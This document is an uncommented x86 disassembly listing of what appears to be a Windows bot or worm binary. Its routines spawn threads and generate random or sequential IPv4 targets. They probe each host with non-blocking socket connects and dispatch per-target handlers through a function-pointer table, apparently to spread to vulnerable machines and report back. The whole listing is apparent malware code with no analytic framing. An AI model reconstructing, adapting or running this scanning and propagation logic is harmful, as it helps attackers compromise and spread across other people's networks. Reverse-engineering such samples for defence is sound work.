call sub_40B0F7
add esp, 1Ch
mov ds:dword_4CDD0C, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4CDB00
push offset sub_40E992
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, ds:dword_4CDD0C
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_40BD2D
loc_40BD1B: ; CODE XREF: sub_40BACE+25D�j
cmp ds:dword_4CDDA0, ebx
jnz short loc_40BD48
push 32h
call dword_427078 ; Sleep
jmp short loc_40BD1B
; ---------------------------------------------------------------------------
loc_40BD2D: ; CODE XREF: sub_40BACE+24B�j
call dword_42708C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset unk_4320A8
push eax
call sub_41B886
add esp, 0Ch
loc_40BD48: ; CODE XREF: sub_40BACE+253�j
lea eax, [ebp+var_204]
push eax
call sub_4151AD
pop ecx
loc_40BD55: ; CODE XREF: sub_40BACE+35�j
mov eax, [ebp+arg_130]
mov ecx, eax
shl ecx, 6
cmp dword_431B14[ecx], ebx
jz loc_40BE7E
push 7
call sub_40B33F
test eax, eax
pop ecx
jnz loc_40BE78
mov eax, ds:dword_4CE39C
cmp [ebp+arg_90], bl
mov ds:dword_4CD7C4, eax
mov eax, [ebp+arg_110]
mov ds:dword_4CD7B8, eax
mov eax, [ebp+arg_138]
mov ds:dword_4CD7C0, ebx
mov ds:dword_4CD848, eax
push 7Fh
jnz short loc_40BDC9
lea eax, [ebp+arg_10]
push eax
push offset dword_4CD7C8
call sub_41B5F0
add esp, 0Ch
mov ds:dword_4CD84C, 1
jmp short loc_40BDE3
; ---------------------------------------------------------------------------
loc_40BDC9: ; CODE XREF: sub_40BACE+2DC�j
lea eax, [ebp+arg_90]
push eax
push offset dword_4CD7C8
call sub_41B5F0
add esp, 0Ch
mov ds:dword_4CD84C, ebx
loc_40BDE3: ; CODE XREF: sub_40BACE+2F9�j
push ds:dword_4CD7C4
lea eax, [ebp+var_204]
push offset unk_432078
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_204]
push 7
push eax
call sub_40B0F7
add esp, 18h
mov ds:dword_4CD7BC, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4CD7B8
push offset sub_40E6F0
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, ds:dword_4CD7BC
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_40BE50
loc_40BE3E: ; CODE XREF: sub_40BACE+380�j
cmp ds:dword_4CD850, ebx
jnz short loc_40BE6B
push 32h
call dword_427078 ; Sleep
jmp short loc_40BE3E
; ---------------------------------------------------------------------------
loc_40BE50: ; CODE XREF: sub_40BACE+36E�j
call dword_42708C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset unk_432040
push eax
call sub_41B886
add esp, 0Ch
loc_40BE6B: ; CODE XREF: sub_40BACE+376�j
lea eax, [ebp+var_204]
push eax
call sub_4151AD
pop ecx
loc_40BE78: ; CODE XREF: sub_40BACE+2A8�j
mov eax, [ebp+arg_130]
loc_40BE7E: ; CODE XREF: sub_40BACE+298�j
shl eax, 6
cmp dword_431B10[eax], ebx
jz loc_40BFA0
push 3
call sub_40B33F
test eax, eax
pop ecx
jnz loc_40BFA0
mov esi, offset dword_4CE034
push 104h
push esi
push ebx
call dword_427070 ; GetModuleFileNameA
push 5Ch
push esi
call sub_41BE40
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40BEBF
mov [eax], bl
loc_40BEBF: ; CODE XREF: sub_40BACE+3ED�j
mov eax, dword_42907C
mov ds:dword_4CE14C, ebx
mov ds:dword_4CE138, eax
lea eax, [ebp+arg_10]
push eax
push offset dword_4CDDAC
call sub_41B886
mov eax, [ebp+arg_110]
pop ecx
pop ecx
mov ds:dword_4CDDA8, eax
mov ecx, [ebp+arg_138]
push esi
push ds:dword_4CE138
mov ds:dword_4CE144, ecx
mov ecx, [ebp+arg_13C]
push eax
mov ds:dword_4CE148, ecx
call sub_40AC10
pop ecx
push eax
lea eax, [ebp+var_204]
push offset unk_42C4E4
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_204]
push 3
push eax
call sub_40B0F7
add esp, 20h
mov ds:dword_4CE140, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4CDDA8
push offset sub_40F0D6
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, ds:dword_4CE140
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_40BF78
loc_40BF66: ; CODE XREF: sub_40BACE+4A8�j
cmp ds:dword_4CE154, ebx
jnz short loc_40BF93
push 32h
call dword_427078 ; Sleep
jmp short loc_40BF66
; ---------------------------------------------------------------------------
loc_40BF78: ; CODE XREF: sub_40BACE+496�j
call dword_42708C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset unk_43200C
push eax
call sub_41B886
add esp, 0Ch
loc_40BF93: ; CODE XREF: sub_40BACE+49E�j
lea eax, [ebp+var_204]
push eax
call sub_4151AD
pop ecx
loc_40BFA0: ; CODE XREF: sub_40BACE+14�j
; sub_40BACE+25�j ...
pop esi
pop ebx
leave
retn
sub_40BACE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BFA4 proc near ; CODE XREF: sub_40C125:loc_40C196�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
push 4
lea esi, ds:4CB7A0h[eax*8]
lea eax, [ebp+arg_0]
push esi
push eax
call sub_41C310
add esp, 0Ch
push [ebp+arg_0]
call ds:dword_4CB57C ; htonl
inc eax
push eax
mov [ebp+arg_0], eax
call ds:dword_4CB650 ; htonl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
push esi
call sub_41C310
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_40BFA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BFEC proc near ; CODE XREF: sub_40C125+69�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
or esi, 0FFFFFFFFh
push [ebp+arg_0]
mov [ebp+var_C], esi
mov [ebp+var_8], esi
mov [ebp+var_4], esi
mov [ebp+var_10], esi
call sub_41AFE0
cmp eax, 0Fh
pop ecx
jbe short loc_40C014
xor eax, eax
jmp short loc_40C085
; ---------------------------------------------------------------------------
loc_40C014: ; CODE XREF: sub_40BFEC+22�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+arg_0]
call sub_41C645
add esp, 18h
cmp [ebp+var_C], esi
jnz short loc_40C041
call sub_41B8E2
mov [ebp+var_C], eax
loc_40C041: ; CODE XREF: sub_40BFEC+4B�j
cmp [ebp+var_8], esi
jnz short loc_40C04E
call sub_41B8E2
mov [ebp+var_8], eax
loc_40C04E: ; CODE XREF: sub_40BFEC+58�j
cmp [ebp+var_4], esi
jnz short loc_40C05B
call sub_41B8E2
mov [ebp+var_4], eax
loc_40C05B: ; CODE XREF: sub_40BFEC+65�j
mov eax, [ebp+var_10]
cmp eax, esi
jnz short loc_40C067
call sub_41B8E2
loc_40C067: ; CODE XREF: sub_40BFEC+74�j
shl eax, 8
add eax, [ebp+var_4]
mov ecx, [ebp+var_C]
shl eax, 8
add eax, [ebp+var_8]
shl eax, 8
add eax, ecx
mov ecx, [ebp+arg_4]
mov ds:dword_4CB7A0[ecx*8], eax
loc_40C085: ; CODE XREF: sub_40BFEC+26�j
pop esi
leave
retn
sub_40BFEC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C088 proc near ; CODE XREF: sub_40B8A2+59�p
; sub_40C125+BB�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
push 1
pop edi
xor ebx, ebx
push ebx
push edi
push 2
mov [ebp+var_4], edi
call ds:dword_4CB6D4 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40C0B1
xor eax, eax
jmp short loc_40C120
; ---------------------------------------------------------------------------
loc_40C0B1: ; CODE XREF: sub_40C088+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call ds:dword_4CB654 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call ds:dword_4CB6F0 ; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call ds:dword_4CB5FC ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_8], ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_120]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call ds:dword_4CB63C ; select
push esi
mov edi, eax
call ds:dword_4CB6EC ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_40C120: ; CODE XREF: sub_40C088+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_40C088 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C125 proc near ; DATA XREF: sub_40C33D+13B�o
var_2A8 = dword ptr -2A8h
var_28C = byte ptr -28Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_1F8 = byte ptr -1F8h
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_150 = byte ptr -150h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_150]
rep movsd
mov esi, [ebp+var_2C]
mov dword ptr [eax+148h], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], esi
mov [ebp+arg_0], eax
call dword_4270A8 ; GetTickCount
push eax
call sub_41B8D8
mov ebx, esi
pop ecx
imul ebx, 234h
loc_40C16C: ; CODE XREF: sub_40C125+204�j
mov eax, dword_43E594[ebx]
cmp ds:dword_4CB7A4[eax*8], 0
jz loc_40C32E
cmp [ebp+var_10], 0
push eax
jz short loc_40C196
lea eax, [ebp+var_150]
push eax
call sub_40BFEC
pop ecx
jmp short loc_40C19B
; ---------------------------------------------------------------------------
loc_40C196: ; CODE XREF: sub_40C125+60�j
call sub_40BFA4
loc_40C19B: ; CODE XREF: sub_40C125+6F�j
pop ecx
mov edi, eax
push [ebp+arg_0]
push dword_43E594[ebx]
push [ebp+var_3C]
push edi
call ds:dword_4CB6E0 ; inet_ntoa
push eax
lea eax, [ebp+var_28C]
push offset unk_43216C
push eax
call sub_41B886
add esp, 18h
lea eax, [ebp+var_28C]
push eax
lea eax, dword_43E390[ebx]
push eax
call sub_41B886
push [ebp+var_38]
push [ebp+var_3C]
push edi
call sub_40C088
add esp, 14h
cmp eax, 1
jnz loc_40C31E
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_40C272
push offset dword_4CD7A0
call dword_4270D4 ; RtlEnterCriticalSection
push [ebp+var_3C]
push edi
call ds:dword_4CB6E0 ; inet_ntoa
push eax
lea eax, [ebp+var_28C]
push offset unk_432144
push eax
call sub_41B886
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_40C254
cmp [ebp+var_C0], 0
push 1
push [ebp+var_18]
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_C0]
jnz short loc_40C248
lea eax, [ebp+var_140]
loc_40C248: ; CODE XREF: sub_40C125+11B�j
push eax
push [ebp+var_40]
call sub_409A73
add esp, 14h
loc_40C254: ; CODE XREF: sub_40C125+100�j
lea eax, [ebp+var_28C]
push eax
call sub_4151AD
mov [esp+2A8h+var_2A8], offset dword_4CD7A0
call dword_4270D0 ; RtlLeaveCriticalSection
jmp loc_40C31E
; ---------------------------------------------------------------------------
loc_40C272: ; CODE XREF: sub_40C125+D0�j
push edi
call ds:dword_4CB6E0 ; inet_ntoa
push eax
lea eax, [ebp+var_208]
push eax
call sub_41B886
mov eax, [ebp+var_20]
pop ecx
shl eax, 6
pop ecx
add eax, offset aSym ; "sym"
push eax
lea eax, [ebp+var_178]
push eax
call sub_41B886
cmp [ebp+var_C0], 0
pop ecx
pop ecx
lea eax, [ebp+var_C0]
jnz short loc_40C2B7
lea eax, [ebp+var_140]
loc_40C2B7: ; CODE XREF: sub_40C125+18A�j
push eax
lea eax, [ebp+var_1F8]
push eax
call sub_41B886
mov eax, [ebp+var_40]
pop ecx
mov [ebp+var_20C], eax
mov eax, [ebp+var_18]
pop ecx
mov [ebp+var_15C], eax
mov eax, [ebp+var_14]
sub esp, 0BCh
mov [ebp+var_158], eax
mov eax, [ebp+var_3C]
push 2Fh
mov [ebp+var_16C], eax
mov eax, [ebp+var_20]
pop ecx
mov [ebp+var_168], esi
mov [ebp+var_164], eax
lea esi, [ebp+var_20C]
mov edi, esp
shl eax, 6
rep movsd
call off_431B04[eax]
mov esi, [ebp+var_4]
add esp, 0BCh
loc_40C31E: ; CODE XREF: sub_40C125+C6�j
; sub_40C125+148�j
push 7D0h
call dword_427078 ; Sleep
jmp loc_40C16C
; ---------------------------------------------------------------------------
loc_40C32E: ; CODE XREF: sub_40C125+55�j
push esi
call sub_40B413
pop ecx
push 0
call dword_4270CC ; ExitThread
sub_40C125 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C33D proc near ; DATA XREF: sub_401ACD+1F82�o
; sub_401ACD+5C49�o
var_1DC = dword ptr -1DCh
var_1CC = byte ptr -1CCh
var_14C = byte ptr -14Ch
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
push 1
pop ebx
rep movsd
mov [eax+144h], ebx
lea eax, [ebp+var_14C]
push eax
call ds:dword_4CB694 ; inet_addr
mov ecx, [ebp+var_2C]
sub esp, 14Ch
lea esi, [ebp+var_14C]
push 53h
mov ds:dword_4CB7A0[ecx*8], eax
pop ecx
mov edi, esp
rep movsd
call sub_40BACE
push 0Bh
call sub_40B33F
add esp, 150h
cmp eax, ebx
jnz short loc_40C40B
mov esi, offset dword_4CD7A0
push esi
call dword_4270DC ; RtlDeleteCriticalSection
push 80000400h
push esi
call dword_4270D8 ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_40C40B
lea eax, [ebp+var_1CC]
push offset unk_432250
push eax
call sub_41B886
xor ebx, ebx
pop ecx
cmp [ebp+var_10], ebx
pop ecx
jnz short loc_40C3F5
push ebx
lea eax, [ebp+var_1CC]
push [ebp+var_14]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_409A73
add esp, 14h
loc_40C3F5: ; CODE XREF: sub_40C33D+99�j
lea eax, [ebp+var_1CC]
push eax
call sub_4151AD
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_40C40B: ; CODE XREF: sub_40C33D+63�j
; sub_40C33D+7F�j
mov eax, [ebp+var_2C]
mov esi, dword_427078
mov edi, ebx
mov ds:dword_4CB7A4[eax*8], ebx
xor ebx, ebx
cmp [ebp+var_20], 1
jb loc_40C4D8
loc_40C429: ; CODE XREF: sub_40C33D+195�j
push edi
lea eax, [ebp+var_14C]
push [ebp+var_2C]
mov [ebp+var_24], edi
push [ebp+var_38]
push eax
lea eax, [ebp+var_1CC]
push offset unk_43221C
push eax
call sub_41B886
push ebx
lea eax, [ebp+var_1CC]
push 0Bh
push eax
call sub_40B0F7
mov [ebp+var_28], eax
imul eax, 234h
mov ecx, [ebp+var_2C]
add esp, 24h
mov dword_43E594[eax], ecx
lea eax, [ebp+var_14C]
push ebx
push ebx
push eax
push offset sub_40C125
push ebx
push ebx
call dword_42707C ; CreateThread
mov ecx, [ebp+var_28]
imul ecx, 234h
cmp eax, ebx
mov dword_43E5A4[ecx], eax
jz short loc_40C4A3
loc_40C498: ; CODE XREF: sub_40C33D+164�j
cmp [ebp+var_4], ebx
jnz short loc_40C4CA
push 1Eh
call esi ; Sleep
jmp short loc_40C498
; ---------------------------------------------------------------------------
loc_40C4A3: ; CODE XREF: sub_40C33D+159�j
call dword_42708C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_1CC]
push offset unk_4321E4
push eax
call sub_41B886
lea eax, [ebp+var_1CC]
push eax
call sub_4151AD
add esp, 10h
loc_40C4CA: ; CODE XREF: sub_40C33D+15E�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp+var_20]
jbe loc_40C429
loc_40C4D8: ; CODE XREF: sub_40C33D+E6�j
cmp [ebp+var_30], ebx
jz loc_40C582
mov eax, [ebp+var_30]
imul eax, 0EA60h
push eax
call esi ; Sleep
loc_40C4ED: ; CODE XREF: sub_40C33D+250�j
push [ebp+var_30]
mov eax, [ebp+var_2C]
push [ebp+var_38]
mov eax, ds:dword_4CB7A0[eax*8]
push eax
call ds:dword_4CB6E0 ; inet_ntoa
push eax
lea eax, [ebp+var_1CC]
push offset unk_4321A4
push eax
call sub_41B886
add esp, 14h
cmp [ebp+var_10], ebx
jnz short loc_40C53B
push ebx
lea eax, [ebp+var_1CC]
push [ebp+var_14]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_409A73
add esp, 14h
loc_40C53B: ; CODE XREF: sub_40C33D+1DF�j
lea eax, [ebp+var_1CC]
push eax
call sub_4151AD
mov eax, [ebp+var_2C]
mov [esp+1DCh+var_1DC], 0BB8h
mov ds:dword_4CB7A4[eax*8], ebx
call esi ; Sleep
push 0Bh
call sub_40B33F
cmp eax, 1
pop ecx
jnz short loc_40C572
push offset dword_4CD7A0
call dword_4270DC ; RtlDeleteCriticalSection
loc_40C572: ; CODE XREF: sub_40C33D+228�j
push [ebp+var_2C]
call sub_40B413
pop ecx
push ebx
call dword_4270CC ; ExitThread
loc_40C582: ; CODE XREF: sub_40C33D+19E�j
; sub_40C33D+25D�j
mov eax, [ebp+var_2C]
cmp ds:dword_4CB7A4[eax*8], 1
jnz loc_40C4ED
push 7D0h
call esi ; Sleep
jmp short loc_40C582
sub_40C33D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C59C proc near ; DATA XREF: sub_40C669+7B�o
; sub_40C75A+7B�o
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0BCh
mov eax, [ebp+arg_0]
push esi
push edi
push 2Bh
pop ecx
mov esi, eax
lea edi, [ebp+var_BC]
push 1
rep movsd
pop esi
mov [eax+0A8h], esi
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_41B590
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_38]
call ds:dword_4CB654 ; htons
mov [ebp+var_E], ax
mov eax, [ebp+var_28]
push 6
push esi
push 2
mov [ebp+var_C], eax
call ds:dword_4CB6D4 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40C65A
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call ds:dword_4CB5FC ; connect
mov ecx, [ebp+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov dword_43E59C[ecx], esi
jz short loc_40C65A
push [ebp+var_38]
push [ebp+var_28]
call ds:dword_4CB6E0 ; inet_ntoa
push eax
mov edi, offset dword_4CE164
push offset unk_432284
push edi
call sub_41B886
push 0
lea eax, [ebp+var_B8]
push [ebp+var_20]
push edi
push eax
push [ebp+var_BC]
call sub_409A73
push edi
call sub_4151AD
add esp, 28h
loc_40C65A: ; CODE XREF: sub_40C59C+5D�j
; sub_40C59C+7E�j
push esi
call ds:dword_4CB6EC ; closesocket
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_40C59C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40C669 proc near ; DATA XREF: sub_401ACD+603F�o
var_134 = byte ptr -134h
var_B4 = byte ptr -0B4h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 134h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 2Bh
mov esi, ebx
pop ecx
lea edi, [ebp+var_B4]
rep movsd
mov esi, dword_427078
mov dword ptr [ebx+0A4h], 1
xor edi, edi
loc_40C697: ; CODE XREF: sub_40C669+EC�j
push [ebp+var_30]
push [ebp+var_20]
call ds:dword_4CB6E0 ; inet_ntoa
push eax
lea eax, [ebp+var_134]
push offset unk_4322AC
push eax
call sub_41B886
lea eax, [ebp+var_134]
push 1FFh
push eax
mov eax, [ebp+var_24]
imul eax, 234h
add eax, offset dword_43E390
push eax
call sub_41B5F0
add esp, 1Ch
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_B4]
push edi
push eax
push offset sub_40C59C
push edi
push edi
call dword_42707C ; CreateThread
cmp eax, edi
mov [ebp+var_4], eax
jz short loc_40C703
loc_40C6F8: ; CODE XREF: sub_40C669+98�j
cmp [ebp+var_C], edi
jnz short loc_40C703
push 32h
call esi ; Sleep
jmp short loc_40C6F8
; ---------------------------------------------------------------------------
loc_40C703: ; CODE XREF: sub_40C669+8D�j
; sub_40C669+92�j
push [ebp+var_4]
call dword_427068 ; CloseHandle
push dword ptr [ebx+8Ch]
mov [ebx+0A8h], edi
call esi ; Sleep
lea eax, [ebp+var_20]
push 4
push eax
lea eax, [ebp+arg_0]
push eax
call sub_41C310
add esp, 0Ch
push [ebp+arg_0]
call ds:dword_4CB57C ; htonl
inc eax
push eax
mov [ebp+arg_0], eax
call ds:dword_4CB650 ; htonl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
lea eax, [ebp+var_20]
push eax
call sub_41C310
add esp, 0Ch
jmp loc_40C697
sub_40C669 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C75A proc near ; DATA XREF: sub_401ACD+5D4F�o
var_130 = byte ptr -130h
var_B0 = dword ptr -0B0h
var_AC = byte ptr -0ACh
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 130h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 2Bh
mov esi, ebx
pop ecx
lea edi, [ebp+var_B0]
rep movsd
mov esi, dword_427078
mov dword ptr [ebx+0A4h], 1
xor edi, edi
loc_40C788: ; CODE XREF: sub_40C75A+BC�j
push [ebp+var_2C]
push [ebp+var_1C]
call ds:dword_4CB6E0 ; inet_ntoa
push eax
lea eax, [ebp+var_130]
push offset unk_432300
push eax
call sub_41B886
lea eax, [ebp+var_130]
push 1FFh
push eax
mov eax, [ebp+var_20]
imul eax, 234h
add eax, offset dword_43E390
push eax
call sub_41B5F0
add esp, 1Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_B0]
push edi
push eax
push offset sub_40C59C
push edi
push edi
call dword_42707C ; CreateThread
cmp eax, edi
mov [ebp+arg_0], eax
jz short loc_40C7F4
loc_40C7E9: ; CODE XREF: sub_40C75A+98�j
cmp [ebp+var_8], edi
jnz short loc_40C7F4
push 32h
call esi ; Sleep
jmp short loc_40C7E9
; ---------------------------------------------------------------------------
loc_40C7F4: ; CODE XREF: sub_40C75A+8D�j
; sub_40C75A+92�j
push [ebp+arg_0]
call dword_427068 ; CloseHandle
push dword ptr [ebx+8Ch]
mov [ebx+0A8h], edi
call esi ; Sleep
mov eax, [ebp+var_2C]
cmp eax, [ebp+var_28]
jz short loc_40C81B
inc [ebp+var_2C]
jmp loc_40C788
; ---------------------------------------------------------------------------
loc_40C81B: ; CODE XREF: sub_40C75A+B7�j
push [ebp+var_1C]
call ds:dword_4CB6E0 ; inet_ntoa
push eax
lea eax, [ebp+var_130]
push offset unk_4322D4
push eax
call sub_41B886
push edi
lea eax, [ebp+var_130]
push [ebp+var_14]
push eax
lea eax, [ebp+var_AC]
push eax
push [ebp+var_B0]
call sub_409A73
push [ebp+var_20]
call sub_40B413
add esp, 24h
xor eax, eax
pop edi
pop esi
pop ebx
leave
retn 4
sub_40C75A endp
; =============== S U B R O U T I N E =======================================
sub_40C867 proc near ; CODE XREF: sub_40CADB+E�p
; sub_40CADB+33�p ...
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax], 0
retn
sub_40C867 endp
; =============== S U B R O U T I N E =======================================
sub_40C871 proc near ; CODE XREF: sub_40CADB+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_4]
push esi
push edi
mov esi, ecx
push ebx
call sub_41B4D5
mov edi, eax
pop ecx
test edi, edi
jz short loc_40C8A3
push ebx
push 0
push edi
call sub_41B590
push ebx
push [esp+1Ch+arg_0]
push edi
call sub_41C310
add esp, 18h
mov [esi+4], ebx
mov [esi], edi
loc_40C8A3: ; CODE XREF: sub_40C871+14�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_40C871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C8AB proc near ; CODE XREF: sub_40C9A5+18�p
; sub_40CA1F+16�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, ecx
push esi
mov ecx, [ebp+arg_C]
push edi
lea edi, [eax+ecx]
push edi
call sub_41B4D5
mov esi, eax
pop ecx
test esi, esi
jz short loc_40C8F7
push edi
push 0
push esi
call sub_41B590
push [ebp+arg_4]
push [ebp+arg_0]
push esi
call sub_41C310
push [ebp+arg_C]
mov eax, [ebp+arg_4]
add eax, esi
push [ebp+arg_8]
push eax
call sub_41C310
add esp, 24h
mov [ebx+4], edi
mov [ebx], esi
loc_40C8F7: ; CODE XREF: sub_40C8AB+1C�j
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn 10h
sub_40C8AB endp
; =============== S U B R O U T I N E =======================================
sub_40C900 proc near ; CODE XREF: sub_40C9A5+5E�p
; sub_40C9A5+6F�p ...
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_40C910
push eax
call sub_41B0B1
pop ecx
loc_40C910: ; CODE XREF: sub_40C900+7�j
and dword ptr [esi+4], 0
and dword ptr [esi], 0
pop esi
retn
sub_40C900 endp
; =============== S U B R O U T I N E =======================================
sub_40C919 proc near ; CODE XREF: sub_40C9A5+20�p
; sub_40CA80+8�p ...
push ebx
push esi
mov esi, ecx
push edi
mov eax, [esi+4]
cmp eax, 0FFFFh
jge short loc_40C946
xor ebx, ebx
cmp eax, 7Fh
setnl bl
dec ebx
and ebx, 0FFFFFFFEh
add ebx, 3
add eax, ebx
push eax
call sub_41B4D5
mov edi, eax
pop ecx
test edi, edi
jnz short loc_40C94A
loc_40C946: ; CODE XREF: sub_40C919+D�j
xor al, al
jmp short loc_40C9A1
; ---------------------------------------------------------------------------
loc_40C94A: ; CODE XREF: sub_40C919+2B�j
mov eax, ebx
add eax, [esi+4]
push eax
push 0
push edi
call sub_41B590
add esp, 0Ch
cmp ebx, 1
jnz short loc_40C96F
mov al, [esi+4]
mov [edi], al
push dword ptr [esi+4]
lea eax, [edi+1]
push dword ptr [esi]
jmp short loc_40C989
; ---------------------------------------------------------------------------
loc_40C96F: ; CODE XREF: sub_40C919+45�j
mov byte ptr [edi], 82h
mov eax, [esi+4]
sar eax, 8
mov [edi+1], al
mov al, [esi+4]
mov [edi+2], al
push dword ptr [esi+4]
lea eax, [edi+3]
push dword ptr [esi]
loc_40C989: ; CODE XREF: sub_40C919+54�j
push eax
call sub_41C310
add esp, 0Ch
push dword ptr [esi]
call sub_41B0B1
add [esi+4], ebx
pop ecx
mov [esi], edi
mov al, 1
loc_40C9A1: ; CODE XREF: sub_40C919+2F�j
pop edi
pop esi
pop ebx
retn
sub_40C919 endp
